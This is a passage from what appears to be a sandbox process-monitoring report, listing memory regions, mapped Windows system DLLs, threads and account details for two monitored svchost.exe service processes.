"\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 3637 start_va = 0x7ff85a2c0000 end_va = 0x7ff85a329fff monitored = 0 entry_point = 0x7ff85a2f6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3638 start_va = 0x7ff85a3c0000 end_va = 0x7ff85a402fff monitored = 0 entry_point = 0x7ff85a3d4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3639 start_va = 0x7ff85a410000 end_va = 0x7ff85a4c4fff monitored = 0 entry_point = 0x7ff85a4522e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 3640 start_va = 0x7ff85a4d0000 end_va = 0x7ff85a521fff monitored = 0 entry_point = 0x7ff85a4df530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3641 start_va = 0x7ff85bcb0000 end_va = 0x7ff85be05fff monitored = 0 entry_point = 0x7ff85bcba8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3642 start_va = 0x7ff85be10000 end_va = 0x7ff85be7efff monitored = 0 entry_point = 0x7ff85be35f70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 3643 start_va = 0x7ff85bea0000 end_va = 0x7ff85bfbbfff monitored = 0 entry_point = 0x7ff85bee02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3644 start_va = 0x7ff85bfd0000 end_va = 0x7ff85c076fff monitored = 0 entry_point = 0x7ff85bfe58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3645 start_va = 0x7ff85c080000 end_va = 0x7ff85c126fff monitored = 0 entry_point = 0x7ff85c08b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3646 start_va = 0x7ff85c130000 end_va = 0x7ff85c1f0fff monitored = 0 entry_point = 0x7ff85c150da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3647 start_va = 0x7ff85c360000 end_va = 0x7ff85c3fcfff monitored = 0 entry_point = 0x7ff85c3678a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3648 start_va = 0x7ff85c410000 end_va = 0x7ff85c552fff monitored = 0 entry_point = 0x7ff85c438210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3649 start_va = 0x7ff85c560000 end_va = 0x7ff85c6e5fff monitored = 0 entry_point = 0x7ff85c5affc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3650 start_va = 0x7ff85cb80000 end_va = 0x7ff85cc2cfff monitored = 0 entry_point = 0x7ff85cb981a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3651 start_va = 0x7ff85cc30000 end_va = 0x7ff85cc8afff monitored = 0 entry_point = 0x7ff85cc438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3652 start_va = 0x7ff85cc90000 end_va = 0x7ff85cf0cfff monitored = 0 entry_point = 0x7ff85cd64970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3653 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 295 os_tid = 0xdf0 Thread: id = 296 os_tid = 0x90c Thread: id = 297 os_tid = 0x808 Thread: id = 298 os_tid = 0x7cc Thread: id = 299 os_tid = 0x7c4 Thread: id = 300 os_tid = 0x570 Thread: id = 301 os_tid = 0x7e0 Thread: id = 302 os_tid = 0x498 Thread: id = 303 os_tid = 0x49c Thread: id = 304 os_tid = 0x5cc Thread: id = 305 os_tid = 0x714 Thread: id = 306 os_tid = 0x1cc Thread: id = 307 os_tid = 0x16c Thread: id = 308 os_tid = 0x37c Thread: id = 309 os_tid = 0x348 Thread: id = 310 os_tid = 0x2fc Thread: id = 311 os_tid = 0x2f8 Thread: id = 312 os_tid = 0x2e4 Thread: id = 313 os_tid = 0x2e0 Thread: id = 314 os_tid = 0x2d8 Thread: id = 315 os_tid = 0x2c4 Thread: id = 316 os_tid = 0x2b4 Thread: id = 317 os_tid = 0x2a8 Thread: id = 318 os_tid = 0x2a0 Thread: id = 319 os_tid = 0x29c Thread: id = 320 os_tid = 0x288 Thread: id = 321 os_tid = 0x278 Process: id = "27" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x56c05000" os_pid = "0x294" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\system32\\svchost.exe -k RPCSS" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\RpcEptMapper" [0xe], "NT SERVICE\\RpcSs" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009c75" [0xc000000f], "LOCAL" [0x7] Region: id = 3654 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3655 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3656 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3657 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3658 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 3659 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 3660 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 3661 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 3662 start_va = 0x110000 end_va = 0x116fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 3663 start_va = 0x120000 end_va = 0x1ddfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3664 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 3665 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 3666 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3667 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3668 start_va = 0x580000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3669 start_va = 0x660000 end_va = 0x666fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 3670 start_va = 0x690000 end_va = 0x696fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 3671 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 3672 start_va = 0x800000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 3673 start_va = 0x900000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 3674 start_va = 0xa00000 end_va = 0xd36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3675 start_va = 0xd40000 end_va = 0x113afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d40000" filename = "" Region: id = 3676 start_va = 0x1140000 end_va = 0x123ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 3677 start_va = 0x1240000 end_va = 0x133ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 3678 start_va = 0x1340000 end_va = 0x143ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Region: id = 3679 start_va = 0x1440000 end_va = 0x153ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 3680 start_va = 0x1540000 end_va = 0x163ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001540000" filename = "" Region: id = 3681 start_va = 0x1640000 end_va = 0x173ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001640000" filename = "" Region: id = 3682 start_va = 0x1740000 end_va = 0x183ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001740000" filename = "" Region: id = 3683 start_va = 0x1900000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 3684 start_va = 0x1a00000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 3685 start_va = 0x1b00000 end_va = 0x1bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 3686 start_va = 0x1c00000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 3687 start_va = 0x1d00000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 3688 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3689 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 3690 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 3691 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 3692 start_va = 0x7ff6c7f10000 end_va = 0x7ff6c7f1cfff monitored = 0 entry_point = 0x7ff6c7f13980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 3693 start_va = 0x7ff84a240000 end_va = 0x7ff84a25afff monitored = 0 entry_point = 0x7ff84a24af40 region_type = mapped_file name = "capauthz.dll" filename = "\\Windows\\System32\\capauthz.dll" (normalized: "c:\\windows\\system32\\capauthz.dll") Region: id = 3694 start_va = 0x7ff8527b0000 end_va = 0x7ff852816fff monitored = 0 entry_point = 0x7ff8527b63e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3695 start_va = 0x7ff855d50000 end_va = 0x7ff855d5ffff monitored = 0 entry_point = 0x7ff855d52c60 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 3696 start_va = 0x7ff857e00000 end_va = 0x7ff857e12fff monitored = 0 entry_point = 0x7ff857e02760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3697 start_va = 0x7ff858570000 end_va = 0x7ff8585a1fff monitored = 0 entry_point = 0x7ff858582340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 3698 start_va = 0x7ff8585b0000 end_va = 0x7ff8585c2fff monitored = 0 entry_point = 0x7ff8585b1b60 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3699 start_va = 0x7ff8585d0000 end_va = 0x7ff8585e6fff monitored = 0 entry_point = 0x7ff8585d6180 region_type = mapped_file name = "rpcepmap.dll" filename = "\\Windows\\System32\\RpcEpMap.dll" (normalized: "c:\\windows\\system32\\rpcepmap.dll") Region: id = 3700 start_va = 0x7ff8585f0000 end_va = 0x7ff8586d2fff monitored = 0 entry_point = 0x7ff85864e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 3701 start_va = 0x7ff858890000 end_va = 0x7ff858983fff monitored = 0 entry_point = 0x7ff85889a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 3702 start_va = 0x7ff858fc0000 end_va = 0x7ff85901bfff monitored = 0 entry_point = 0x7ff858fd6f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 3703 start_va = 0x7ff859020000 end_va = 0x7ff859075fff monitored = 0 entry_point = 0x7ff859030bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3704 start_va = 0x7ff8593d0000 end_va = 0x7ff8593fcfff monitored = 0 entry_point = 0x7ff8593e9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3705 start_va = 0x7ff859580000 end_va = 0x7ff8595a8fff monitored = 0 entry_point = 0x7ff859594530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3706 start_va = 0x7ff859720000 end_va = 0x7ff85972efff monitored = 0 entry_point = 0x7ff859723210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3707 start_va = 0x7ff859730000 end_va = 0x7ff85977afff monitored = 0 entry_point = 0x7ff8597335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3708 start_va = 0x7ff859a20000 end_va = 0x7ff859c07fff monitored = 0 entry_point = 0x7ff859a4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3709 start_va = 0x7ff85a2c0000 end_va = 0x7ff85a329fff monitored = 0 entry_point = 0x7ff85a2f6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3710 start_va = 0x7ff85a330000 end_va = 0x7ff85a3b5fff monitored = 0 entry_point = 0x7ff85a33d8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 3711 start_va = 0x7ff85bea0000 end_va = 0x7ff85bfbbfff monitored = 0 entry_point = 0x7ff85bee02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3712 start_va = 0x7ff85bfd0000 end_va = 0x7ff85c076fff monitored = 0 entry_point = 0x7ff85bfe58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3713 start_va = 0x7ff85c080000 end_va = 0x7ff85c126fff monitored = 0 entry_point = 0x7ff85c08b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3714 start_va = 0x7ff85c360000 end_va = 0x7ff85c3fcfff monitored = 0 entry_point = 0x7ff85c3678a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3715 start_va = 0x7ff85cb80000 end_va = 0x7ff85cc2cfff monitored = 0 entry_point = 0x7ff85cb981a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3716 start_va = 0x7ff85cc30000 end_va = 0x7ff85cc8afff monitored = 0 entry_point = 0x7ff85cc438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3717 start_va = 0x7ff85cc90000 end_va = 0x7ff85cf0cfff monitored = 0 entry_point = 0x7ff85cd64970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3718 start_va = 0x7ff85cf10000 end_va = 0x7ff85cf7afff monitored = 0 entry_point = 0x7ff85cf290c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3719 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 322 os_tid = 0xa84 Thread: id = 323 os_tid = 0x970 Thread: id = 324 os_tid = 0x820 Thread: id = 325 os_tid = 0x1b8 Thread: id = 326 os_tid = 0x14c Thread: id = 327 os_tid = 0x35c Thread: id = 328 os_tid = 0x314 Thread: id = 329 os_tid = 0x2d4 Thread: id = 330 os_tid = 0x2cc Thread: id = 331 os_tid = 0x2bc Thread: id = 332 os_tid = 0x2b8 Thread: id = 333 os_tid = 0x2b0 Thread: id = 334 os_tid = 0x298 Process: id = "28" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x564ad000" os_pid = "0x36c" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BFE" [0xa], "NT SERVICE\\CoreMessagingRegistrar" [0xe], "NT SERVICE\\DPS" [0xa], "NT SERVICE\\MpsSvc" [0xa], "NT SERVICE\\NcdAutoSetup" [0xa], "NT SERVICE\\pla" [0xa], "NT SERVICE\\WwanSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b26f" [0xc000000f], "LOCAL" [0x7], "NT AUTHORITY\\WRITE RESTRICTED" [0x7] Region: id = 4344 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4345 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4346 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4347 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4348 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 4349 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 4350 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 4351 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4352 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 4353 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4354 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 4355 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 4356 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4357 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4358 start_va = 0x480000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 4359 start_va = 0x540000 end_va = 0x546fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 4360 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 4361 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 4362 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 4363 start_va = 0x580000 end_va = 0x586fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 4364 start_va = 0x590000 end_va = 0x597fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 4365 start_va = 0x5a0000 end_va = 0x5a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 4366 start_va = 0x5b0000 end_va = 0x5b4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 4367 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4368 start_va = 0x5d0000 end_va = 0x5d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 4369 start_va = 0x5e0000 end_va = 0x5e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 4370 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 4371 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 4372 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 4373 start_va = 0x800000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 4374 start_va = 0x990000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 4375 start_va = 0xb20000 end_va = 0xf1afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 4376 start_va = 0xf20000 end_va = 0xfa0fff monitored = 0 entry_point = 0xf2d8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 4377 start_va = 0xfb0000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 4378 start_va = 0x1030000 end_va = 0x1030fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 4379 start_va = 0x1040000 end_va = 0x1040fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 4380 start_va = 0x1050000 end_va = 0x1056fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 4381 start_va = 0x1060000 end_va = 0x106ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001060000" filename = "" Region: id = 4382 start_va = 0x1070000 end_va = 0x107ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001070000" filename = "" Region: id = 4383 start_va = 0x1080000 end_va = 0x108ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001080000" filename = "" Region: id = 4384 start_va = 0x1090000 end_va = 0x109ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001090000" filename = "" Region: id = 4385 start_va = 0x10a0000 end_va = 0x10affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010a0000" filename = "" Region: id = 4386 start_va = 0x10b0000 end_va = 0x10bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010b0000" filename = "" Region: id = 4387 start_va = 0x10c0000 end_va = 0x10cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 4388 start_va = 0x10d0000 end_va = 0x10dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010d0000" filename = "" Region: id = 4389 start_va = 0x10e0000 end_va = 0x10e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 4390 start_va = 0x10f0000 end_va = 0x10f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Region: id = 4391 start_va = 0x1100000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 4392 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 4393 start_va = 0x1300000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 4394 start_va = 0x1b00000 end_va = 0x1bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 4395 start_va = 0x1c00000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 4396 start_va = 0x1d00000 end_va = 